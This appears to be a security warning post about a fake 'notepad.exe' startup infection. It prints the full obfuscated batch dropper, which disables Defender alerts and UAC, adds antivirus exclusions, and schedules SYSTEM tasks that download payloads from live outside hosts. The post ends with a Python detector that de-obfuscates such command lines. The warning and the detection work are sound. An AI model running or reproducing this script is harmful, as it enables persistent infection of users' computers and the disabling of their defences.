
Preventing Malware: Protect Against Notepad.exe Virus


Be careful with this virus. McAfee detects it under the name “ti!FC93760371B9”. Even if the program deletes it, it copies itself to this location again: “C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”

The “notepad.exe” virus that appears in this location uses the following commands, hidden in the registry and run through genuine Windows scheduled tasks, as an interface for executing hidden commands sent from the internet. If you find such a file in this location, take urgent measures.

@echo OFF
mode con cols=15 lines=1
p""oW""ErsH""el""l.exe -NoP -NonI -W Hidden -Exec Bypass IEX 
@echo off
cls
dir

call :Admin

:Admin
reg query "HKU\S-1-5-19\Environment" >nul 2>&1
if not %errorlevel% EQU 0 (
    cls
    p""oW""ErsH""ell.exe -windowstyle hidden -Noprofile "Start-Process '%~dpnx0' -Verb RunAs"
    exit
)

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_dword /d 1 /f

p""oW""Er""sH""ell.exe -command Add-MpPreference -ExclusionPath c"":

s""cht""as""k""s /create /tn OneDriveApiUpReDown /tr "Powershell -Command Invoke-WebRequest https://textbin.net/raw/ozntsv0f5a -Outfile %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\OneDriveApiUpReDown.cmd" /ru System /sc weekly /d MON,FRI /f
s""cht""as""k""s /create /tn OneDriveApiUpDown /tr "Powershell -Command Invoke-WebRequest https://files.catbox.moe/ich44z.dat -Outfile %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\notepad.exe" /ru System /SC ONLOGON /DELAY 0000:59 /f
s""cht""as""k""s /create /tn OneDriveApiUpAd /tr "Powershell -command Add-MpPreference -ExclusionPath %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup" /ru System /SC ONLOGON /DELAY 0000:45 /f

timeout 3

p""oW""ErsH""ell.exe -Command Add-MpPreference -ExclusionPath %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup

p""oW""Er""sH""ell.exe -Command Invoke-WebRequest https://files.catbox.moe/ich44z.dat -Outfile %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\notepad.exe

ta""sKKi""ll /IM "AddInUtil.exe" /F
ta""sKKi""ll /IM "aspnet_compiler.exe" /F
ta""sKKi""ll /IM "MSBuild.exe" /F
ta""sKKi""ll /IM "RegAsm.exe" /F
ta""sKKi""ll /IM "AddInProcess.exe" /F
ta""sKKi""ll /IM "RegSvcs.exe" /F

p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath c:
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath c:\
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\AppData\Roaming
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\AppData\Roaming\
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\AppData\Local\Temp
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\AppData\Local\Temp\

p""oW""ErsH""ell.exe -exEc bypass -enc cgBlAGcALgBlAHgAZQAgAEEARABEACAASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACAALwB2ACAARQBuAGEAYgBsAGUATABVAEEAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADAAIAAvAGYADQAKAA==

cls
c:
cd\
cd "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
start notepad.exe
timeout 3
del *.cmd /f /q

cls
exit
exit
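
The doubled quotes inside keywords, the backticks in paths and the Base64 -enc argument in the script above all defeat plain string matching on command lines. The following is an added example, not part of the original post, that normalizes such lines and decodes the -enc payload before matching. The rule names, the ExampleTask task name and the example.invalid URL are assumptions made for illustration.

```python
import base64
import re

# Behaviours seen in the script above, matched on the de-obfuscated command line.
RULES = {
    "defender_exclusion": r"add-mppreference\s+-exclusionpath",
    "defender_notifications_off": r"\breg(\.exe)?\s+add\b.*disablenotifications",
    "uac_disabled": r"\breg(\.exe)?\s+add\b.*\benablelua\b.*/d\s+0\b",
    "download_to_startup": r"invoke-webrequest\b.*-outfile\b.*programs\\startup",
    "system_task_created": r"\bschtasks(\.exe)?\s+/create\b.*/ru\s+system\b",
}
ENC_ARG = re.compile(r"powershell(?:\.exe)?\b.*?\s-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# The -enc argument exactly as it appears in the script on this page.
PAGE_ENC = ("cgBlAGcALgBlAHgAZQAgAEEARABEACAASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIA"
            "bwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAA"
            "bwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACAALwB2ACAARQBuAGEAYgBsAGUATABVAEEAIAAvAHQA"
            "IABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADAAIAAvAGYADQAKAA==")
# Constructed lines in the page's obfuscation style; task name and URL are placeholders.
SAMPLE = [
    'p""oW""ErsH""ell.exe -exEc bypass -enc ' + PAGE_ENC,
    r's""cht""as""k""s /create /tn ExampleTask /tr "Powershell -Command Invoke-WebRequest https://example.invalid/p '
    r'-Outfile %APPDATA%\Microsoft\Windows\Start` Menu\Programs\Startup\notepad.exe" /ru System /SC ONLOGON /f',
]


def normalize(line):
    """Drop doubled-quote pairs, carets and backticks used to split keywords and escape spaces."""
    return re.sub(r'""|[\^`]', "", line).strip()


def decode_enc(line):
    """Return the UTF-16LE text behind a PowerShell -enc argument, or None."""
    m = ENC_ARG.search(normalize(line))
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le").strip() if m else None
    except ValueError:  # invalid Base64 or odd byte count: not an encoded command
        return None


def classify(line):
    """Return sorted names of the rules hit by the line or by its decoded -enc payload."""
    texts = [t for t in (normalize(line), decode_enc(line)) if t]
    return sorted(n for n, p in RULES.items() if any(re.search(p, t, re.I) for t in texts))


if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry), "<-", (decode_enc(entry) or normalize(entry))[:70])
```

The decoded -enc argument is a reg.exe command that sets EnableLUA to 0 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, which turns off UAC.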